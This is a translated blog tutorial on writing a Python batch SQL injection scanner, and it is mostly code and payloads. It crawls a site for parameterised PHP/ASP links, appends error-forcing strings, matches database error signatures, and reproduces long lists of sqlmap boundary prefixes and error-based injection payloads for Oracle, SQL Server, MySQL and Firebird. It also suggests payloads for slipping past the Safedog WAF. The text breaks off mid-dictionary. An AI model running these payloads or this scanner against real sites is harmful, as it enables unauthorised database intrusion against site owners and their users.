Batch SQL Injection Scanning in Python

In a crowd you sometimes see a back that looks familiar; you rush over without a second thought, and when the person turns around it is a stranger's face.

Original version 1.0

Flowchart

First crawl the site to collect its links, then test each of those links, and finally save the results locally.

Design

Crawling links

Admittedly, I did not write a proper regular expression for extracting links. I simply look for href values and drop any that contain http or javascript. The crawled results go into a list; since one crawl can return a great many links and there is no need to test them all, I filter at the end and randomly pick 5 links to test.

import re
import requests

# url is the site root chosen by the caller; fetch its front page first
r_crawl = requests.get(url)
# Pull every href value; a real HTML parser would be more robust than this regex
r_sql = re.findall('href="(.*?)"', r_crawl.text)
list_none = []
for sql_sql in r_sql:
    # Keep only relative links to PHP pages that carry a query string,
    # skipping absolute URLs and javascript: pseudo-links
    if 'php?' in sql_sql and 'http' not in sql_sql and 'javascript' not in sql_sql:
        list_none.append(url + '/' + sql_sql.lstrip('/'))

Likewise, replacing php with asp, aspx and so on crawls asp/aspx links.
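Added example (not the post's code): a link collector for the crawling step above, built on html.parser and urllib.parse. It goes a little beyond the snippet by handling several extensions at once and, unlike the `'http' not in` test, keeping absolute links that point back to the crawled host while dropping other hosts, javascript: pseudo-links and pages without a query string. `SAMPLE_HTML` is constructed and the function names are mine.

```python
import random
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page: several extensions, an absolute same-host link,
# an off-site link, a javascript: pseudo-link, a static page and a duplicate.
SAMPLE_HTML = """
<a href="news.php?id=1">news</a>
<a href="/news.php?id=1">same link, absolute path</a>
<a href="http://example.test/item.asp?cat=2">same host, absolute URL</a>
<a href="https://other.test/list.php?p=3">other host</a>
<a href="javascript:void(0)">js</a>
<a href="about.html">static</a>
<a href="view.aspx?f=x">aspx</a>
"""


class HrefCollector(HTMLParser):
    """Collect the href of every <a> tag with a real HTML parser instead of a regex."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def extract_candidate_links(base_url, html, exts=("php", "asp", "aspx")):
    """Return deduplicated same-host links to dynamic pages that carry a query string.

    Relative hrefs are resolved against base_url; links to other hosts,
    javascript: pseudo-links and pages without parameters are dropped.
    """
    parser = HrefCollector()
    parser.feed(html)
    base_host = urlsplit(base_url).netloc
    found = []
    for href in parser.hrefs:
        absolute = urljoin(base_url, href)
        parts = urlsplit(absolute)
        if parts.scheme not in ("http", "https") or parts.netloc != base_host:
            continue
        if not parts.query:
            continue
        ext = parts.path.rsplit(".", 1)[-1].lower() if "." in parts.path else ""
        if ext in exts and absolute not in found:
            found.append(absolute)
    return found


def sample_links(links, k=5, seed=None):
    """Pick at most k links to test, as the post does with its random choice of 5."""
    return random.Random(seed).sample(links, min(k, len(links)))


if __name__ == "__main__":
    for link in sample_links(extract_candidate_links("http://example.test/", SAMPLE_HTML), seed=1):
        print(link)
```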

Verifying injection

The idea is to append something that makes the database throw an error, such as a single quote or and 1=2, to the link as a payload, and then check whether the returned page contains a database error message.

SQL payloads

payloads = ("'", "')", "';", '"', '")', '";',"--","-0",") AND 1998=1532 AND (5526=5526"," AND 5434=5692%23"," %' AND 5268=2356 AND '%'='"," ') AND 6103=4103 AND ('vPKl'='vPKl"," ' AND 7738=8291 AND 'UFqV'='UFqV",'`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C")

Database error messages

sql_errors = {'SQL syntax': 'mysql', 'syntax to use near': 'mysql',
              'MySQLSyntaxErrorException': 'mysql', 'valid MySQL result': 'mysql',
              'Access Database Engine': 'Access', 'JET Database Engine': 'Access',
              'Microsoft Access Driver': 'Access',
              'SQLServerException': 'mssql', 'SqlException': 'mssql',
              'SQLServer JDBC Driver': 'mssql', 'Incorrect syntax': 'mssql',
              'MySQL Query fail': 'mysql'}

The rest is easy to follow: append a verification payload to each crawled link, then check whether the returned page contains a database error message; that is how injection is judged.

Optimisation

It really is crude, but most injection scanners on the market basically work this way. There are a few performance optimisations, to be written up later...

  1. When collecting links, also descend into second-level directories, for fuller coverage
  2. Use payloads such as ||1=1 to get past injection detection by software like Safedog
  3. Detect with blind injection
  4. Prettier output
  5. A detailed injection trace

Langzi_SQL_INJECTION_2.0

Introduction

I had long wanted to port sqlmap's injection detection, but too many things got in the way and I never started. Recently, to complete Langzi_Api, I had to read the sqlmap source earlier than planned and port the functionality. As I said in an earlier article, sqlmap detects injection in 5 ways, checking injection points in turn; the payloads are easy to find in the files under the sqlmap directory, so I extracted them with regular expressions and added verification.

Detection methods

sqlmap has five injection detection techniques. I dropped U (UNION query), S (stacked queries) and T (time-based blind);
for UNION query injection only the first part of its payload detection was borrowed.

Kept: E (error-based) and B (boolean-based blind).

On top of that I defined some comment sequences of my own to force the page to error out, as a supplement.

Take the prefix and suffix, wrap them around the payload at the injection point, and send the request; for the error-based type, regex-match the result, for the blind type, judge the similarity of the returned page.

UNION query is somewhat involved and time-based blind is slow, so neither is extracted or verified here.

Prefixes and suffixes

Prefixes and suffixes first. The request and decision go as follows:

Injection URL: url + prefix + payload + suffix
Send the request
Decide from the response

For error-based injection a regex match on the response is enough; for boolean-based, page similarity has to be judged. Similarity is computed with the difflib library.
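Added example, not the post's code: the difflib similarity check described above, together with the LEVEL 1 decision rule spelled out in the boolean-blind notes later in the post (true-condition page looks like the original, false-condition page differs from both, true-condition page is not the error page). The four page bodies and the timestamp pattern are constructed; the `volatile` parameter exists because timestamps, CSRF tokens and view counters otherwise make two identical pages look different and the rule fails.

```python
import re
from difflib import SequenceMatcher

# Constructed pages for one parameter: the original response, the response to a
# true condition, the response to a false condition, and a database error page.
# Each carries a generation timestamp, the kind of volatile content that breaks naive comparison.
ORIGINAL = "<html><p>Generated 2018-05-01 10:00:01</p><h1>Article 1</h1><p>Body text of article one.</p></html>"
POSITIVE = "<html><p>Generated 2018-05-02 17:43:56</p><h1>Article 1</h1><p>Body text of article one.</p></html>"
NEGATIVE = "<html><p>Generated 2018-05-02 17:44:10</p><h1>No article found</h1></html>"
ERROR_PAGE = ("<html><p>Generated 2018-05-02 17:44:30</p><b>Warning</b>: mysql_fetch_array(): "
              "supplied argument is not a valid MySQL result resource</html>")
TIMESTAMP = r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}"


def normalize(body, volatile=None):
    """Collapse whitespace and blank out content matched by the optional
    `volatile` regex (timestamps, CSRF tokens, view counters) before comparing."""
    if volatile:
        body = re.sub(volatile, "", body)
    return re.sub(r"\s+", " ", body).strip()


def page_similarity(a, b, volatile=None):
    """difflib ratio in [0, 1]; 1.0 means identical after normalisation."""
    return SequenceMatcher(None, normalize(a, volatile), normalize(b, volatile)).ratio()


def level1_verdict(original, positive, negative, error_page, threshold=0.98, volatile=None):
    """LEVEL 1 rule from the boolean-blind notes: the true-condition page must look
    like the original, the false-condition page must differ from both, and the
    true-condition page must not be the error page."""
    def same(x, y):
        return page_similarity(x, y, volatile) >= threshold
    return (same(original, positive)
            and not same(original, negative)
            and not same(positive, negative)
            and not same(positive, error_page))


if __name__ == "__main__":
    print("naive similarity of original vs true-condition page: %.3f" % page_similarity(ORIGINAL, POSITIVE))
    print("with timestamps ignored: %.3f" % page_similarity(ORIGINAL, POSITIVE, volatile=TIMESTAMP))
    print("verdict (timestamps ignored):", level1_verdict(ORIGINAL, POSITIVE, NEGATIVE, ERROR_PAGE, volatile=TIMESTAMP))
```

Without the timestamp stripped, the same four pages yield a false negative, which is the usual reason a similarity-based check misses or misreports a page.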

The sqlmap prefixes and suffixes come from:

sqlmap\boundaries.xml

They were extracted with a regular expression and stored in a prefix/suffix dictionary.

'''
Prefixes and suffixes
Five placeholders need to be filled in:
RANDSTR  # random string, 4 bytes
RANDNUM  # random number, any value
RANDSTR1 # random string, 4 bytes, changed later
RANDSTR2 # same as above
ORIGINAL # the original value of the URL parameter
'''
pre_suf = {

    'pre_suf_1': {'prefix': ')',
                  'suffix': '('},

    'pre_suf_2': {'prefix': '))',
                  'suffix': '(('},

    'pre_suf_3': {'prefix': "')",
                  'suffix': "('"},

    'pre_suf_4': {'prefix': '"',
                  'suffix': '"'},

    'pre_suf_5': {'prefix': "'",
                  'suffix': "'"},

    'pre_suf_6': {'prefix': '")',
                  'suffix': '("'},

    'pre_suf_7': {'prefix': ')"',
                  'suffix': '"('},

    'pre_suf_8': {'prefix': ")'",
                  'suffix': "('"},

    'pre_suf_9': {'prefix': ')))',
                  'suffix': '((('},

    'pre_suf_10': {'prefix': ')',
                   'suffix': '%23'},

    'pre_suf_11': {'prefix': ')',
                   'suffix': '--+'},

    'pre_suf_12': {'prefix': "')",
                   'suffix': '%23'},

    'pre_suf_13': {'prefix': "')",
                   'suffix': '--+'},

    'pre_suf_14': {'prefix': '"',
                   'suffix': '%23'},

    'pre_suf_15': {'prefix': '"',
                   'suffix': '--+'},

    'pre_suf_16': {'prefix': "'",
                   'suffix': "--+"},

    'pre_suf_17': {'prefix': ')',
                   'suffix': ' AND ([RANDNUM]=[RANDNUM]'},

    'pre_suf_18': {'prefix': '))',
                   'suffix': ' AND (([RANDNUM]=[RANDNUM]'},

    'pre_suf_19': {'prefix': ')))',
                   'suffix': '( AND ((([RANDNUM]=[RANDNUM]'},

    'pre_suf_20': {'prefix': "')",
                   'suffix': " AND ('[RANDSTR]'='[RANDSTR]"},

    'pre_suf_21': {'prefix': "'))",
                   'suffix': " AND (('[RANDSTR]'='[RANDSTR]"},

    'pre_suf_22': {'prefix': "')))",
                   'suffix': " AND ((('[RANDSTR]'='[RANDSTR]"},

    'pre_suf_23': {'prefix': "'",
                   'suffix': " AND '[RANDSTR]'='[RANDSTR]"},

    'pre_suf_24': {'prefix': "')",
                   'suffix': " AND ('[RANDSTR]' LIKE '[RANDSTR]"},

    'pre_suf_25': {'prefix': "'))",
                   'suffix': " AND (('[RANDSTR]' LIKE '[RANDSTR]"},

    'pre_suf_26': {'prefix': "')))",
                   'suffix': " AND ((('[RANDSTR]' LIKE '[RANDSTR]"},

    'pre_suf_27': {'prefix': '")',
                   'suffix': ' AND ("[RANDSTR]"="[RANDSTR]'},

    'pre_suf_28': {'prefix': '"))',
                   'suffix': ' AND (("[RANDSTR]"="[RANDSTR]'},

    'pre_suf_29': {'prefix': '")))',
                   'suffix': ' AND ((("[RANDSTR]"="[RANDSTR]'},

    'pre_suf_30': {'prefix': '"',
                   'suffix': ' AND "[RANDSTR]"="[RANDSTR]'},

    'pre_suf_31': {'prefix': '")',
                   'suffix': ' AND ("[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_32': {'prefix': '"))',
                   'suffix': ' AND (("[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_33': {'prefix': '")))',
                   'suffix': ' AND ((("[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_34': {'prefix': '"',
                   'suffix': ' AND "[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_35': {'prefix': ' ',
                   'suffix': '# [RANDSTR]'},

    'pre_suf_36': {'prefix': ' ',
                   'suffix': '%23'},

    'pre_suf_38': {'prefix': "'",
                   'suffix': " OR '[RANDSTR1]'='[RANDSTR2]"},

    'pre_suf_39': {'prefix': "') WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_40': {'prefix': "') WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_41': {'prefix': '") WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_42': {'prefix': '") WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_43': {'prefix': ') WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_44': {'prefix': ') WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_45': {'prefix': "' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_46': {'prefix': "' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_47': {'prefix': '" WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_48': {'prefix': '" WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_49': {'prefix': ' WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_50': {'prefix': ' WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_51': {'prefix': "'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': "||'"},

    'pre_suf_52': {'prefix': "'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': "||'"},

    'pre_suf_53': {'prefix': "'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': "+'"},

    'pre_suf_54': {'prefix': "||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '||'},

    'pre_suf_55': {'prefix': "||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '||'},

    'pre_suf_56': {'prefix': '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '+'},

    'pre_suf_57': {'prefix': "+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '+'},

    'pre_suf_58': {'prefix': "')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_59': {'prefix': "')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_60': {'prefix': '")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_61': {'prefix': '")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_62': {'prefix': ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_63': {'prefix': ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_64': {'prefix': "') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_65': {'prefix': "') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_66': {'prefix': '") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_67': {'prefix': '") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_68': {'prefix': ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_69': {'prefix': ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_70': {'prefix': '` WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_71': {'prefix': '` WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_72': {'prefix': '`) WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_73': {'prefix': '`) WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_74': {'prefix': '`=`[ORIGINAL]`',
                   'suffix': ' AND `[ORIGINAL]`=`[ORIGINAL]'},

    'pre_suf_75': {'prefix': '"="[ORIGINAL]"',
                   'suffix': ' AND "[ORIGINAL]"="[ORIGINAL]'},

    'pre_suf_76': {'prefix': ']-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': ')|[[ORIGINAL]'},

    'pre_suf_77': {'prefix': "' IN BOOLEAN MODE)",
                   'suffix': '#'}

}

Error-based

First, the payloads that force the page to throw an error; I tidied them up a little, but the list is probably still incomplete.

level11_payloads = (
"'", "')", "';", '"', '")', '";', ' order By 500 ', "--", "-0", ") AND 1998=1532 AND (5526=5526", " AND 5434=5692%23",
" %' AND 5268=2356 AND '%'='", " ') AND 6103=4103 AND ('vPKl'='vPKl",
" ' AND 7738=8291 AND 'UFqV'='UFqV", '`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C",
"'and (select 1 from (select count(*),concat(database(),':',floor(rand()*2)) as a from information_schema.tables group by a)as b limit 0,1)--+")

This list holds suffixes to append to the URL; if no WAF blocks them and the site's developer did no filtering, they cause an error once they reach the database. For consistent encoding the suffixes are URL-encoded.

from urllib import quote  # Python 2, like the rest of this code; on Python 3 use: from urllib.parse import quote
level1_payloads = [quote(x) for x in level11_payloads]

If the page throws an error, the keys and values of the dictionary below are regex-matched against it. The error messages come from:

sqlmap\xml\errors.xml

The error patterns and their database types were extracted with a regular expression and merged into one dictionary.

# Pattern -> DBMS family; raw strings keep the regex backslashes intact
sql_errors = {r'SQL syntax': 'MYSQL',
              r'syntax to use near': 'MYSQL',
              r'MySQLSyntaxErrorException': 'MYSQL',
              r'valid MySQL result': 'MYSQL',
              r'SQL syntax.*?MySQL': 'MYSQL',
              r'Warning.*?mysql_': 'MYSQL',
              r'MySqlException \(0x': 'MYSQL',
              r'PostgreSQL.*?ERROR': 'PostgreSQL',
              r'Warning.*?\Wpg_': 'PostgreSQL',
              r'valid PostgreSQL result': 'PostgreSQL',
              r'Npgsql\.': 'PostgreSQL',
              r'PG::SyntaxError:': 'PostgreSQL',
              r'org\.postgresql\.util\.PSQLException': 'PostgreSQL',
              r'ERROR:\s\ssyntax error at or near': 'PostgreSQL',
              r'Driver.*? SQL[\-\_\ ]*Server': 'Microsoft SQL Server',
              r'OLE DB.*? SQL Server': 'Microsoft SQL Server',
              r'SQL Server[^<"]+Driver': 'Microsoft SQL Server',   # single-quoted so the " in the class is legal
              r'Warning.*?(mssql|sqlsrv)_': 'Microsoft SQL Server',
              r'SQL Server[^<"]+[0-9a-fA-F]{8}': 'Microsoft SQL Server',
              r'System\.Data\.SqlClient\.SqlException': 'Microsoft SQL Server',
              r'(?s)Exception.*?\WRoadhouse\.Cms\.': 'Microsoft SQL Server',
              r"Microsoft SQL Native Client error '[0-9a-fA-F]{8}": 'Microsoft SQL Server',
              r'com\.microsoft\.sqlserver\.jdbc\.SQLServerException': 'Microsoft SQL Server',
              r'ODBC SQL Server Driver': 'Microsoft SQL Server',
              r'ODBC Driver \d+ for SQL Server': 'Microsoft SQL Server',
              r'SQLServer JDBC Driver': 'Microsoft SQL Server',
              r'macromedia\.jdbc\.sqlserver': 'Microsoft SQL Server',
              r'com\.jnetdirect\.jsql': 'Microsoft SQL Server',
              r'SQLSrvException': 'Microsoft SQL Server',
              r'Microsoft Access (\d+ )?Driver': 'Microsoft Access',
              r'JET Database Engine': 'Microsoft Access',
              r'Access Database Engine': 'Microsoft Access',
              r'ODBC Microsoft Access': 'Microsoft Access',
              r'Syntax error \(missing operator\) in query expression': 'Microsoft Access',
              r'ORA-\d{5}': 'Oracle',
              r'Oracle error': 'Oracle',
              r'Oracle.*?Driver': 'Oracle',
              r'Warning.*?\Woci_': 'Oracle',
              r'Warning.*?\Wora_': 'Oracle',
              r'oracle\.jdbc\.driver': 'Oracle',
              r'quoted string not properly terminated': 'Oracle',
              r'SQL command not properly ended': 'Oracle',
              # DB2: the pattern is the key and the DBMS name the value (the original had these swapped)
              r'CLI Driver.*?DB2': 'DB2',
              r'DB2 SQL error': 'DB2',
              r'db2_\w+\(': 'DB2',
              r'SQLSTATE.+SQLCODE': 'DB2',
              r'check the manual that corresponds to your (MySQL|MariaDB) server version': 'MYSQL',
              r"Unknown column '[^ ]+' in 'field list'": 'MYSQL',
              r'MySqlClient\.': 'MYSQL',
              r'com\.mysql\.jdbc\.exceptions': 'MYSQL',
              r'Zend_Db_Statement_Mysqli_Exception': 'MYSQL',
              r'Microsoft Access Driver': 'Microsoft Access',
              r'SQLServerException': 'Microsoft SQL Server',
              r'SqlException': 'Microsoft SQL Server',
              r'Incorrect syntax': 'Microsoft SQL Server',
              r'MySQL Query fail': 'MYSQL',
              r'Unknown column.*?order clause': 'MYSQL'
              }
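Added example (not the post's code): the error-fingerprinting step run over constructed response bodies, using a short subset of the sql_errors patterns above in the same pattern-to-DBMS shape. Compiling with DOTALL lets a pattern span line breaks in an HTML error page; IGNORECASE is my assumption about how the patterns should be applied. The sample responses and the function names are mine.

```python
import re

# Constructed response bodies (not captured from any real site)
SAMPLE_RESPONSES = {
    "mysql": "<b>Warning</b>: mysql_fetch_array(): supplied argument is not a "
             "valid MySQL result resource in /var/www/news.php on line 12",
    "mssql": "Microsoft OLE DB Provider for SQL Server error '80040e14'<br>"
             "Unclosed quotation mark after the character string ''.",
    "oracle": "java.sql.SQLSyntaxErrorException: ORA-00933: SQL command not properly ended",
    "db2": "[IBM][CLI Driver][DB2/LINUX] SQL0104N  An unexpected token was found",
    "clean": "<html><body><h1>Latest news</h1><p>Nothing to see here.</p></body></html>",
}

# Subset of the sql_errors dict above, same pattern -> DBMS shape
SQL_ERROR_SIGNATURES = {
    r"valid MySQL result": "MYSQL",
    r"Warning.*?mysql_": "MYSQL",
    r"OLE DB.*? SQL Server": "Microsoft SQL Server",
    r'SQL Server[^<"]+[0-9a-fA-F]{8}': "Microsoft SQL Server",
    r"ORA-\d{5}": "Oracle",
    r"SQL command not properly ended": "Oracle",
    r"CLI Driver.*?DB2": "DB2",
    r"SQLSTATE.+SQLCODE": "DB2",
}


def compile_signatures(signatures):
    """Compile once. DOTALL lets a pattern span line breaks in an HTML error page;
    IGNORECASE is an assumption about how the patterns should be applied."""
    return [(re.compile(p, re.DOTALL | re.IGNORECASE), dbms) for p, dbms in signatures.items()]


COMPILED = compile_signatures(SQL_ERROR_SIGNATURES)


def fingerprint_error(body, compiled=COMPILED):
    """Return (dbms, matched_text) for the first signature that fires, or None
    when the body looks like a normal page."""
    for pattern, dbms in compiled:
        m = pattern.search(body)
        if m:
            return dbms, m.group(0)
    return None


def classify_responses(responses, compiled=COMPILED):
    """Label each named response with the DBMS whose error text it leaks (None if clean)."""
    result = {}
    for name, body in responses.items():
        hit = fingerprint_error(body, compiled)
        result[name] = hit[0] if hit else None
    return result


if __name__ == "__main__":
    for name, dbms in classify_responses(SAMPLE_RESPONSES).items():
        print("%-7s -> %s" % (name, dbms))
```

The same function is useful on the defending side: run it over an application's own test responses to catch verbose database errors reaching the client before a scanner does.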

That was the first step, which I completed myself; the second is to load and use sqlmap's error-based injection payloads, taken from:

sqlmap\payloads\error_based.xml

Again extracted with a regular expression and saved in a new list. The clever part of sqlmap is that it verifies with randomly generated parameters.

'''
Some specific placeholders are needed:
DELIMITER_START # random characters marking the start
RANDNUM # random number
DELIMITER_STOP # random characters marking the end
RANDNUM1 # random number + 1
RANDNUM2 # random number + 2
RANDNUM3 # random number + 3
RANDNUM4 # random number + 4
RANDNUM5 # random number + 5
'''
error_base_injection = {
    'INJPAY_27':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_26':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')"},
    'INJPAY_25':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')"},
    'INJPAY_24':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_23':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_22':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')"},
    'INJPAY_21':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')"},
    'INJPAY_20':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_50':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))"},
    'INJPAY_29':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_28':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_51':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])"},
    'INJPAY_38':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))"},
    'INJPAY_39':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))"},
    'INJPAY_55':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))"},
    'INJPAY_30':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_31':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')"},
    'INJPAY_32':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')"},
    'INJPAY_33':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
